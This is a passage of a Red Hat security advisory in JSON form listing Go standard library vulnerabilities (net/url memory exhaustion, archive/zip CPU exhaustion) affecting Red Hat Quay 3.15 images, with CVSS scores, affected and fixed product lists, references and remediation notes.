"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
